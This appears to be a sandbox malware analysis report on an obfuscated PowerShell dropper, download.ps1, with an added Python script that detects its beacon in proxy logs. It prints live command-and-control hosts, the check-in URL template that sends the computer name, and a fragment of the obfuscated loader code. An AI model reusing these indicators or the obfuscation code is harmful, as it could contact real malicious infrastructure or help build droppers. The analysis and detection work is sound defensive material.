

Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1585341
MD5: 6e85589d5b99cc0147e0a2411c974061
SHA1: 762c32d847189b201d92f50d641ad751ea90a613
SHA256: de56f2adb28159654d43754aed8f485a3f4808d759103434882f3e9290bfb8dd
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 5032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5032, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5032, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T14:34:07.935887+0100 | 2057741 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 45.61.136.138 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T14:34:07.935887+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49710 | 45.61.136.138 | 80 | TCP
2025-01-07T14:34:08.572367+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49711 | 142.250.184.228 | 80 | TCP



AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 84.3% probability
Source: Binary string: pdblib.pdbH source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBEBA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V source: powershell.exe, 00000000.00000002.2181821964.000001D9B1A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbogramFi source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb.0? source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBE03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb (x! source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdbg source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb=\\ENGI source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking

Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49710 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 45.61.136.138
Source: Joe Sandbox View | ASN Name: AS40676US
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49711 -> 142.250.184.228:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49710 -> 45.61.136.138:80
Source: global traffic | HTTP traffic detected: GET /4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: jjdgdeffjimfgne.top Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: jjdgdeffjimfgne.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=527
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2223453498.000001D9CBBF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftF
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://jjdgdeffjimfgne.top
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527
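The template string recovered from memory (`http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=527`) together with the request actually sent gives the check-in a fixed shape: a random `.php` path, the computer name as `id`, a numeric `key`, the constant `s=527`, and the stock WindowsPowerShell user agent over port 80. The following is an added example, not part of the report or of the sample, that runs that shape and the weaker "PowerShell over plaintext HTTP" condition (the two Suricata hits above) over constructed proxy log lines. The first two lines mirror the observed requests; the `shop.example.com` and `cdn.example.net` lines, their paths and their `key` values are invented to show a non-match and a second match with a different host.

```python
"""Flag check-ins of the shape seen in the report above.

Added example (not from the sandbox report or the sample). Log lines are
constructed: src_ip <TAB> method <TAB> url <TAB> user_agent."""
import re
from urllib.parse import parse_qs, urlsplit

# Stock PowerShell user agent seen on both requests in the report.
PS_UA = re.compile(r"\bWindowsPowerShell/\d", re.I)
# Random lowercase/digit script name the template resolves to (4s1uhzd0w5htr.php).
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{8,20}\.php$", re.I)
CHECKIN_S = "527"  # constant third parameter in both the template and the request

SAMPLE_LOG = "\n".join([
    # mirrors the observed check-in
    "192.168.2.6\tGET\thttp://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527"
    "\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682",
    # mirrors the connectivity probe to Google on port 80
    "192.168.2.6\tGET\thttp://www.google.com/"
    "\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682",
    # constructed: a browser hitting a .php with similar parameters must not fire
    "192.168.2.7\tGET\thttps://shop.example.com/index.php?id=42&s=527"
    "\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0",
    # constructed: same beacon shape, different host, path and key
    "192.168.2.8\tGET\thttp://cdn.example.net/p0q9w8e7r6t5y.php?id=WS-0042&key=88127331001&s=527"
    "\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682",
])


def classify(line: str):
    """Return (src_ip, severity, reason) findings for one log line."""
    src, _method, url, ua = line.split("\t", 3)
    findings = []
    if not PS_UA.search(ua):
        return findings                      # not PowerShell-originated
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if parts.scheme == "http":
        # low severity: PowerShell talking plaintext HTTP at all
        findings.append((src, "low",
                         f"PowerShell user agent over plaintext HTTP to {parts.hostname}"))
    key = query.get("key", [""])[0]
    if (CHECKIN_PATH.match(parts.path) and "id" in query
            and query.get("s", [""])[0] == CHECKIN_S and key.isdigit()):
        # high severity: the full check-in shape (random .php, id, numeric key, s=527)
        findings.append((src, "high",
                         f"check-in beacon to {parts.hostname}: "
                         f"id={query['id'][0]} key={key} s={CHECKIN_S}"))
    return findings


def scan(log_text: str):
    """Classify every non-empty line; results keep log order."""
    return [f for line in log_text.splitlines() if line.strip() for f in classify(line)]


if __name__ == "__main__":
    for src, sev, reason in scan(SAMPLE_LOG):
        print(f"{sev:5} {src:12} {reason}")
```

The low-severity condition alone is noisy on hosts where administrators script against internal HTTP endpoints; the value is in the pairing, where a plaintext request from a PowerShell user agent to a freshly registered domain is followed by the full check-in shape from the same source address.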
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B61A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6194000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B619D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B53CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348D7D46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C95F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348D8AF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C94F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C54EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C65FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C9EE2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C57F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348D08FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C90DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C286A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C58CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C730B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348CEB40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C83FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348C7402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34992E92
Source: classification engine | Classification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4j11xlv.b0c.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $y3tfeizdwbq6mlr.(([system.String]::new(@((1700-(-7013+8646)),(-9953+10064),(7789-(3303+(19372446/4429))),(2016-(695+(-3541+(-3373+(31604030/(1985+(6715560/3516))))))),(629496/7494),(246-135)))))( $2d64igjrz15vcyt ) $y3tfeizdwbq6mlr.(([system.String]::new(@((125424/(469872/(-7069+7320))),(-9488+9596),(896325/8075),(6653-6538),(684578/6778)))))()$fy9u7kh6ezi8r0b.(([char[]]@((483539/(349+(8483-(6243590/(8119-4253))))),(266760/(16754010/(6164+619))),(-8302+8413),(2419-2304),(9071-8970)) -join ''))()[byte[]] $xbsnruld30okfw7 = $2d64igjrz15vcyt.(([char[]]@((199752/(21742054/9143)),(-9263+(36427364/3886)),(693-628),(4233-(5430-1311)),(-6248+(10308-3946)),(-3436+(-1036+(42135318/(78368556/8498)))),(121484/(6504-(4612+(-8309+(5136+(5746-(-932+2617)))))))) -join ''))() $2o5yj68qiwfzamv=$xbsnruld30okfw7 return $2o5yj68qiwfzamv}[System.Text.Encoding]::ascii.(([system.String]::new(@((4551-(-5540+10020)),(-7193+(36119888/(5049-97))),(513880/(5819-1389)),(-7304+(13675-(8324-2036))),(10264-(11089-941)),(-8711+8825),(9667-9562),(928400/(15558-7118)),(454848/4416)))))((zrmnqphigy0klb76ofdx5w9a182 "…
